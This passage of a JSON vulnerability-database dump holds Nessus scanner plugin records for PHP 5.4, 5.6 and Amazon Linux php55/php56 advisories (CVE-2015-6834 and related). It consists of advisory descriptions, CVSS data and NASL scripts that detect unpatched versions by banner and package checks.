script_set_attribute(attribute:\"vuln_publication_date\", value:\"2014/09/10\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/09/03\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/09/10\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:php:php\");\n script_set_attribute(attribute:\"thorough_tests\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"CGI abuses\");\n\n script_copyright(english:\"This script is Copyright (C) 2015-2022 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n\n script_dependencies(\"php_version.nasl\");\n script_require_keys(\"www/PHP\");\n script_require_ports(\"Services/www\", 80);\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"http.inc\");\ninclude(\"webapp_func.inc\");\n\nport = get_http_port(default:80, php:TRUE);\n\nphp = get_php_from_kb(\n port : port,\n exit_on_fail : TRUE\n);\n\nversion = php[\"ver\"];\nsource = php[\"src\"];\n\nbackported = get_kb_item('www/php/'+port+'/'+version+'/backported');\n\nif (report_paranoia < 2 && backported) audit(AUDIT_BACKPORT_SERVICE, port, \"PHP \"+version+\" install\");\n\n# Check that it is the correct version of PHP\nif (version =~ \"^5(\\.6)?$\") audit(AUDIT_VER_NOT_GRANULAR, \"PHP\", port, version);\nif (version !~ \"^5\\.6\\.\") audit(AUDIT_NOT_DETECT, \"PHP version 5.6.x\", port);\n\nif (version =~ \"^5\\.6\\.([0-9]|1[0-2])($|[^0-9])\")\n{\n if (report_verbosity > 0)\n {\n report =\n '\\n Version source : '+source +\n '\\n Installed version : '+version +\n '\\n Fixed version : 5.6.13' +\n '\\n';\n security_hole(port:port, extra:report);\n }\n else security_hole(port);\n exit(0);\n}\nelse audit(AUDIT_LISTEN_NOT_VULN, \"PHP\", port, version);\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-07-13T15:58:18", "description": "According to its banner, the version of PHP running on the remote web server is 5.6.x prior to 5.6.13. It is, therefore, affected by multiple vulnerabilities :\n\n - Multiple use-after-free memory errors exist related to the unserialize() function, which a remote attacker can exploit to execute arbitrary code. (CVE-2015-6834)\n\n - A use-after-free memory error exists related to the php_var_unserialize() function. A remote attacker, using a crafted serialize string, can exploit this to execute arbitrary code. 
(CVE-2015-6835)\n\n - A type confusion error exists related to the serialize_function_call() function due to improper validation of the headers field, which a remote attacker can exploit to have unspecified impact. (CVE-2015-6836)\n\n - A flaw exists in the XSLTProcessor class due to improper validation of input from the libxslt library, which a remote attacker can exploit to have an unspecified impact. (CVE-2015-6837, CVE-2015-6838)\n\n - A flaw exists in the php_zip_extract_file() function in file php_zip.c due to improper sanitization of user-supplied input. An unauthenticated, remote attacker can exploit this to create arbitrary directories outside of the restricted path.\n\n - A NULL pointer dereference flaw exists in the spl_autoload() function in file php_spl.c due to improper sanitization of user-supplied input. An unauthenticated, remote attacker can exploit this to cause a PHP application to crash.\n\n - A flaw exists in the parse_ini_file() and parse_ini_string() functions due to improper sanitization of user-supplied input. An unauthenticated, remote attacker can exploit this to cause a PHP application to crash.\n\n - A flaw exists in the CLI SAPI Web Server due to improper sanitization of user-supplied input. 
An unauthenticated, remote attacker can exploit this to access arbitrary files outside of the restricted path.\n\nNote that the scanner has not tested for these issues but has instead relied only on the application's self-reported version number.", "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2019-01-09T00:00:00", "type": "nessus", "title": "PHP 5.6.x < 5.6.13 Multiple Vulnerabilities", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-9767", "CVE-2015-6834", "CVE-2015-6835", "CVE-2015-6836", "CVE-2015-6837", "CVE-2015-6838"], "modified": "2021-10-07T00:00:00", "cpe": ["cpe:2.3:a:php:php:*:*:*:*:*:*:*:*"], "id": "WEB_APPLICATION_SCANNING_98805", "href": "https://www.tenable.com/plugins/was/98805", "sourceData": "No source data", "cvss": {"score": 7.5, "vector": "CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-04-12T16:05:00", "description": "According to its banner, the version of PHP running on the remote web server is 5.4.x prior to 5.4.45. It is, therefore, affected by the following vulnerabilities :\n\n - A directory traversal vulnerability in the ZipArchive::extractTo function in ext/zip/php_zip.c could allow a remote attacker to create arbitrary empty directories via a crafted ZIP archive.\n (CVE-2014-9767)\n\n - Multiple use-after-free memory errors exist related to the unserialize() function. A remote attacker can exploit these errors to execute arbitrary code.\n (CVE-2015-6834)\n\n - A use-after-free memory error exists related to the php_var_unserialize() function. A remote attacker, using a crafted serialize string, can exploit this to execute arbitrary code. (CVE-2015-6835)\n\n - A type confusion error exists related to the serialize_function_call() function due to improper validation of the headers field. A remote attacker can exploit this to have unspecified impact. 
(CVE-2015-6836)\n\n - Multiple flaws exist in the XSLTProcessor class due to improper validation of input from the libxslt library. A remote attacker can exploit these flaws to have an unspecified impact. (CVE-2015-6837, CVE-2015-6838)\n\n - A flaw exists in the php_zip_extract_file() function in file php_zip.c due to improper sanitization of user-supplied input. An unauthenticated, remote attacker can exploit this to create arbitrary directories outside of the restricted path.\n\nNote that Nessus has not tested for these issues but has instead relied only on the application's self-reported version number.", "cvss3": {"score": 7.3, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L"}, "published": "2015-09-10T00:00:00", "type": "nessus", "title": "PHP 5.4.x < 5.4.45 Multiple Vulnerabilities", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-9767", "CVE-2015-6834", "CVE-2015-6835", "CVE-2015-6836", "CVE-2015-6837", "CVE-2015-6838"], "modified": "2022-04-11T00:00:00", "cpe": ["cpe:/a:php:php"], "id": "PHP_5_4_45.NASL", "href": "https://www.tenable.com/plugins/nessus/85885", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(85885);\n script_version(\"1.14\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/04/11\");\n\n script_cve_id(\n \"CVE-2014-9767\",\n \"CVE-2015-6834\",\n \"CVE-2015-6835\",\n \"CVE-2015-6836\",\n \"CVE-2015-6837\",\n \"CVE-2015-6838\"\n );\n script_bugtraq_id(\n 76644,\n 76649,\n 76652,\n 76733,\n 76734,\n 76738\n );\n\n script_name(english:\"PHP 5.4.x < 5.4.45 Multiple Vulnerabilities\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote web server uses a version of PHP that is affected by\nmultiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to its banner, the version of PHP running on the remote 
web\nserver is 5.4.x prior to 5.4.45. It is, therefore, affected by the\nfollowing vulnerabilities :\n\n - A directory traversal vulnerability in the\n ZipArchive::extractTo function in ext/zip/php_zip.c\n could allow a remote attacker to create arbitrary\n empty directories via a crafted ZIP archive.\n (CVE-2014-9767)\n\n - Multiple use-after-free memory errors exist related to\n the unserialize() function. A remote attacker can\n exploit these errors to execute arbitrary code.\n (CVE-2015-6834)\n\n - A use-after-free memory error exists related to the\n php_var_unserialize() function. A remote attacker, using\n a crafted serialize string, can exploit this to execute\n arbitrary code. (CVE-2015-6835)\n\n - A type confusion error exists related to the\n serialize_function_call() function due to improper\n validation of the headers field. A remote attacker can\n exploit this to have unspecified impact. (CVE-2015-6836)\n\n - Multiple flaws exist in the XSLTProcessor class due to\n improper validation of input from the libxslt library. A\n remote attacker can exploit thse flaws to have an\n unspecified impact. (CVE-2015-6837, CVE-2015-6838)\n\n - A flaw exists in the php_zip_extract_file() function\n in file php_zip.c due to improper sanitization of\n user-supplied input. 
An unauthenticated, remote attacker\n can exploit this to create arbitrary directories outside\n of the restricted path.\n\nNote that Nessus has not tested for these issues but has instead\nrelied only on the application's self-reported version number.\");\n script_set_attribute(attribute:\"see_also\", value:\"http://php.net/ChangeLog-5.php#5.4.45\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to PHP version 5.4.45 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2015-6836\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No exploit is required\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2014/09/10\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/09/03\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/09/10\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:php:php\");\n script_set_attribute(attribute:\"thorough_tests\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"CGI abuses\");\n\n script_copyright(english:\"This script is Copyright (C) 2015-2022 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n\n script_dependencies(\"php_version.nasl\");\n script_require_keys(\"www/PHP\");\n script_require_ports(\"Services/www\", 80);\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"http.inc\");\ninclude(\"webapp_func.inc\");\n\nport = get_http_port(default:80, php:TRUE);\n\nphp = get_php_from_kb(\n port : port,\n exit_on_fail : TRUE\n);\n\nversion = php[\"ver\"];\nsource = php[\"src\"];\n\nbackported = get_kb_item('www/php/'+port+'/'+version+'/backported');\n\nif (report_paranoia < 2 && backported) audit(AUDIT_BACKPORT_SERVICE, port, \"PHP \"+version+\" install\");\n\n# Check that it is the correct version of PHP\nif (version =~ \"^5(\\.4)?$\") audit(AUDIT_VER_NOT_GRANULAR, \"PHP\", port, version);\nif (version !~ \"^5\\.4\\.\") audit(AUDIT_NOT_DETECT, \"PHP version 5.4.x\", port);\n\nif (version =~ \"^5\\.4\\.([0-9]|[1-3][0-9]|4[0-4])($|[^0-9])\")\n{\n if (report_verbosity > 0)\n {\n report =\n '\\n Version source : ' + source +\n '\\n Installed version : ' + version +\n '\\n Fixed version : 5.4.45' +\n '\\n';\n security_hole(port:port, extra:report);\n }\n else security_hole(port);\n exit(0);\n}\nelse audit(AUDIT_LISTEN_NOT_VULN, \"PHP\", port, version);\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-10-16T01:35:53", "description": "As reported upstream, A NULL pointer dereference flaw was found in the way PHP's Phar extension parsed Phar archives. A specially crafted archive could cause PHP to crash. (CVE-2015-7803 )\n\nA flaw was discovered in the way PHP performed object unserialization.\nSpecially crafted input processed by the unserialize() function could cause a PHP application to crash or, possibly, execute arbitrary code.\n(CVE-2015-6834 , CVE-2015-6835 , CVE-2015-6836)\n\nA NULL pointer dereference flaw was found in the XSLTProcessor class in PHP. 
An attacker could use this flaw to cause a PHP application to crash if it performed Extensible Stylesheet Language (XSL) transformations using untrusted XSLT files and allowed the use of PHP functions to be used as XSLT functions within XSL stylesheets.\n(CVE-2015-6837 , CVE-2015-6838)\n\nAs reported upstream, an uninitialized pointer use flaw was found in the phar_make_dirstream() function of PHP's Phar extension. A specially crafted phar file in the ZIP format with a directory entry with a file name '/ZIP' could cause a PHP application function to crash. (CVE-2015-7804)", "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2015-10-22T00:00:00", "type": "nessus", "title": "Amazon Linux AMI : php55 (ALAS-2015-602)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2015-6834", "CVE-2015-6835", "CVE-2015-6836", "CVE-2015-6837", "CVE-2015-6838", "CVE-2015-7803", "CVE-2015-7804"], "modified": "2018-04-18T00:00:00", "cpe": ["p-cpe:/a:amazon:linux:php55", "p-cpe:/a:amazon:linux:php55-bcmath", "p-cpe:/a:amazon:linux:php55-cli", "p-cpe:/a:amazon:linux:php55-common", "p-cpe:/a:amazon:linux:php55-dba", "p-cpe:/a:amazon:linux:php55-debuginfo", "p-cpe:/a:amazon:linux:php55-devel", "p-cpe:/a:amazon:linux:php55-embedded", "p-cpe:/a:amazon:linux:php55-enchant", "p-cpe:/a:amazon:linux:php55-fpm", "p-cpe:/a:amazon:linux:php55-gd", "p-cpe:/a:amazon:linux:php55-gmp", "p-cpe:/a:amazon:linux:php55-imap", "p-cpe:/a:amazon:linux:php55-intl", "p-cpe:/a:amazon:linux:php55-ldap", "p-cpe:/a:amazon:linux:php55-mbstring", "p-cpe:/a:amazon:linux:php55-mcrypt", "p-cpe:/a:amazon:linux:php55-mssql", "p-cpe:/a:amazon:linux:php55-mysqlnd", "p-cpe:/a:amazon:linux:php55-odbc", "p-cpe:/a:amazon:linux:php55-opcache", "p-cpe:/a:amazon:linux:php55-pdo", "p-cpe:/a:amazon:linux:php55-pgsql", "p-cpe:/a:amazon:linux:php55-process", "p-cpe:/a:amazon:linux:php55-pspell", "p-cpe:/a:amazon:linux:php55-recode", "p-cpe:/a:amazon:linux:php55-snmp", 
"p-cpe:/a:amazon:linux:php55-soap", "p-cpe:/a:amazon:linux:php55-tidy", "p-cpe:/a:amazon:linux:php55-xml", "p-cpe:/a:amazon:linux:php55-xmlrpc", "cpe:/o:amazon:linux"], "id": "ALA_ALAS-2015-602.NASL", "href": "https://www.tenable.com/plugins/nessus/86496", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Amazon Linux AMI Security Advisory ALAS-2015-602.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(86496);\n script_version(\"2.6\");\n script_cvs_date(\"Date: 2018/04/18 15:09:35\");\n\n script_cve_id(\"CVE-2015-6834\", \"CVE-2015-6835\", \"CVE-2015-6836\", \"CVE-2015-6837\", \"CVE-2015-6838\", \"CVE-2015-7803\", \"CVE-2015-7804\");\n script_xref(name:\"ALAS\", value:\"2015-602\");\n\n script_name(english:\"Amazon Linux AMI : php55 (ALAS-2015-602)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Amazon Linux AMI host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"As reported upstream, A NULL pointer dereference flaw was found in the\nway PHP's Phar extension parsed Phar archives. A specially crafted\narchive could cause PHP to crash. (CVE-2015-7803 )\n\nA flaw was discovered in the way PHP performed object unserialization.\nSpecially crafted input processed by the unserialize() function could\ncause a PHP application to crash or, possibly, execute arbitrary code.\n(CVE-2015-6834 , CVE-2015-6835 , CVE-2015-6836)\n\nA NULL pointer dereference flaw was found in the XSLTProcessor class\nin PHP. 
An attacker could use this flaw to cause a PHP application to\ncrash if it performed Extensible Stylesheet Language (XSL)\ntransformations using untrusted XSLT files and allowed the use of PHP\nfunctions to be used as XSLT functions within XSL stylesheets.\n(CVE-2015-6837 , CVE-2015-6838)\n\nAs reported upstream, an uninitialized pointer use flaw was found in\nthe phar_make_dirstream() function of PHP's Phar extension. A\nspecially crafted phar file in the ZIP format with a directory entry\nwith a file name '/ZIP' could cause a PHP application function to\ncrash. (CVE-2015-7804)\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugs.php.net/bug.php?id=69720\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugs.php.net/bug.php?id=70433\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://alas.aws.amazon.com/ALAS-2015-602.html\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Run 'yum update php55' to update your system.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php55\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php55-bcmath\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php55-cli\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php55-common\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php55-dba\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php55-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php55-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php55-embedded\");\n script_set_attribute(attribute:\"cpe\", 
value:\"p-cpe:/a:amazon:linux:php55-enchant\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php55-fpm\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php55-gd\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php55-gmp\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php55-imap\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php55-intl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php55-ldap\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php55-mbstring\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php55-mcrypt\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php55-mssql\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php55-mysqlnd\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php55-odbc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php55-opcache\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php55-pdo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php55-pgsql\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php55-process\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php55-pspell\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php55-recode\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php55-snmp\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php55-soap\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php55-tidy\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php55-xml\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php55-xmlrpc\");\n 
script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:amazon:linux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/10/20\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/10/22\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2015-2018 Tenable Network Security, Inc.\");\n script_family(english:\"Amazon Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/AmazonLinux/release\", \"Host/AmazonLinux/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nrelease = get_kb_item(\"Host/AmazonLinux/release\");\nif (isnull(release) || !strlen(release)) audit(AUDIT_OS_NOT, \"Amazon Linux\");\nos_ver = pregmatch(pattern: \"^AL(A|\\d)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Amazon Linux\");\nos_ver = os_ver[1];\nif (os_ver != \"A\")\n{\n if (os_ver == 'A') os_ver = 'AMI';\n audit(AUDIT_OS_NOT, \"Amazon Linux AMI\", \"Amazon Linux \" + os_ver);\n}\n\nif (!get_kb_item(\"Host/AmazonLinux/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (rpm_check(release:\"ALA\", reference:\"php55-5.5.30-1.110.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"php55-bcmath-5.5.30-1.110.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"php55-cli-5.5.30-1.110.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"php55-common-5.5.30-1.110.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"php55-dba-5.5.30-1.110.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"php55-debuginfo-5.5.30-1.110.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"php55-devel-5.5.30-1.110.amzn1\")) flag++;\nif 
(rpm_check(release:\"ALA\", reference:\"php55-embedded-5.5.30-1.110.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"php55-enchant-5.5.30-1.110.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"php55-fpm-5.5.30-1.110.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"php55-gd-5.5.30-1.110.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"php55-gmp-5.5.30-1.110.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"php55-imap-5.5.30-1.110.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"php55-intl-5.5.30-1.110.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"php55-ldap-5.5.30-1.110.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"php55-mbstring-5.5.30-1.110.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"php55-mcrypt-5.5.30-1.110.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"php55-mssql-5.5.30-1.110.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"php55-mysqlnd-5.5.30-1.110.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"php55-odbc-5.5.30-1.110.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"php55-opcache-5.5.30-1.110.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"php55-pdo-5.5.30-1.110.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"php55-pgsql-5.5.30-1.110.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"php55-process-5.5.30-1.110.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"php55-pspell-5.5.30-1.110.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"php55-recode-5.5.30-1.110.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"php55-snmp-5.5.30-1.110.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"php55-soap-5.5.30-1.110.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"php55-tidy-5.5.30-1.110.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"php55-xml-5.5.30-1.110.amzn1\")) flag++;\nif 
(rpm_check(release:\"ALA\", reference:\"php55-xmlrpc-5.5.30-1.110.amzn1\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"php55 / php55-bcmath / php55-cli / php55-common / php55-dba / etc\");\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-10-16T01:35:53", "description": "As reported upstream, A NULL pointer dereference flaw was found in the way PHP's Phar extension parsed Phar archives. A specially crafted archive could cause PHP to crash. (CVE-2015-7803 )\n\nA flaw was discovered in the way PHP performed object unserialization.\nSpecially crafted input processed by the unserialize() function could cause a PHP application to crash or, possibly, execute arbitrary code.\n(CVE-2015-6834 , CVE-2015-6835 , CVE-2015-6836)\n\nA NULL pointer dereference flaw was found in the XSLTProcessor class in PHP. An attacker could use this flaw to cause a PHP application to crash if it performed Extensible Stylesheet Language (XSL) transformations using untrusted XSLT files and allowed the use of PHP functions to be used as XSLT functions within XSL stylesheets.\n(CVE-2015-6837 , CVE-2015-6838)\n\nAs reported upstream, an uninitialized pointer use flaw was found in the phar_make_dirstream() function of PHP's Phar extension. A specially crafted phar file in the ZIP format with a directory entry with a file name '/ZIP' could cause a PHP application function to crash. 
(CVE-2015-7804)", "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2015-10-22T00:00:00", "type": "nessus", "title": "Amazon Linux AMI : php56 (ALAS-2015-601)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2015-6834", "CVE-2015-6835", "CVE-2015-6836", "CVE-2015-6837", "CVE-2015-6838", "CVE-2015-7803", "CVE-2015-7804"], "modified": "2018-04-18T00:00:00", "cpe": ["p-cpe:/a:amazon:linux:php56", "p-cpe:/a:amazon:linux:php56-bcmath", "p-cpe:/a:amazon:linux:php56-cli", "p-cpe:/a:amazon:linux:php56-common", "p-cpe:/a:amazon:linux:php56-dba", "p-cpe:/a:amazon:linux:php56-dbg", "p-cpe:/a:amazon:linux:php56-debuginfo", "p-cpe:/a:amazon:linux:php56-devel", "p-cpe:/a:amazon:linux:php56-embedded", "p-cpe:/a:amazon:linux:php56-enchant", "p-cpe:/a:amazon:linux:php56-fpm", "p-cpe:/a:amazon:linux:php56-gd", "p-cpe:/a:amazon:linux:php56-gmp", "p-cpe:/a:amazon:linux:php56-imap", "p-cpe:/a:amazon:linux:php56-intl", "p-cpe:/a:amazon:linux:php56-ldap", "p-cpe:/a:amazon:linux:php56-mbstring", "p-cpe:/a:amazon:linux:php56-mcrypt", "p-cpe:/a:amazon:linux:php56-mssql", "p-cpe:/a:amazon:linux:php56-mysqlnd", "p-cpe:/a:amazon:linux:php56-odbc", "p-cpe:/a:amazon:linux:php56-opcache", "p-cpe:/a:amazon:linux:php56-pdo", "p-cpe:/a:amazon:linux:php56-pgsql", "p-cpe:/a:amazon:linux:php56-process", "p-cpe:/a:amazon:linux:php56-pspell", "p-cpe:/a:amazon:linux:php56-recode", "p-cpe:/a:amazon:linux:php56-snmp", "p-cpe:/a:amazon:linux:php56-soap", "p-cpe:/a:amazon:linux:php56-tidy", "p-cpe:/a:amazon:linux:php56-xml", "p-cpe:/a:amazon:linux:php56-xmlrpc", "cpe:/o:amazon:linux"], "id": "ALA_ALAS-2015-601.NASL", "href": "https://www.tenable.com/plugins/nessus/86495", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Amazon Linux AMI Security Advisory ALAS-2015-601.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(86495);\n 
script_version(\"2.6\");\n script_cvs_date(\"Date: 2018/04/18 15:09:35\");\n\n script_cve_id(\"CVE-2015-6834\", \"CVE-2015-6835\", \"CVE-2015-6836\", \"CVE-2015-6837\", \"CVE-2015-6838\", \"CVE-2015-7803\", \"CVE-2015-7804\");\n script_xref(name:\"ALAS\", value:\"2015-601\");\n\n script_name(english:\"Amazon Linux AMI : php56 (ALAS-2015-601)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Amazon Linux AMI host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"As reported upstream, A NULL pointer dereference flaw was found in the\nway PHP's Phar extension parsed Phar archives. A specially crafted\narchive could cause PHP to crash. (CVE-2015-7803 )\n\nA flaw was discovered in the way PHP performed object unserialization.\nSpecially crafted input processed by the unserialize() function could\ncause a PHP application to crash or, possibly, execute arbitrary code.\n(CVE-2015-6834 , CVE-2015-6835 , CVE-2015-6836)\n\nA NULL pointer dereference flaw was found in the XSLTProcessor class\nin PHP. An attacker could use this flaw to cause a PHP application to\ncrash if it performed Extensible Stylesheet Language (XSL)\ntransformations using untrusted XSLT files and allowed the use of PHP\nfunctions to be used as XSLT functions within XSL stylesheets.\n(CVE-2015-6837 , CVE-2015-6838)\n\nAs reported upstream, an uninitialized pointer use flaw was found in\nthe phar_make_dirstream() function of PHP's Phar extension. A\nspecially crafted phar file in the ZIP format with a directory entry\nwith a file name '/ZIP' could cause a PHP application function to\ncrash. 
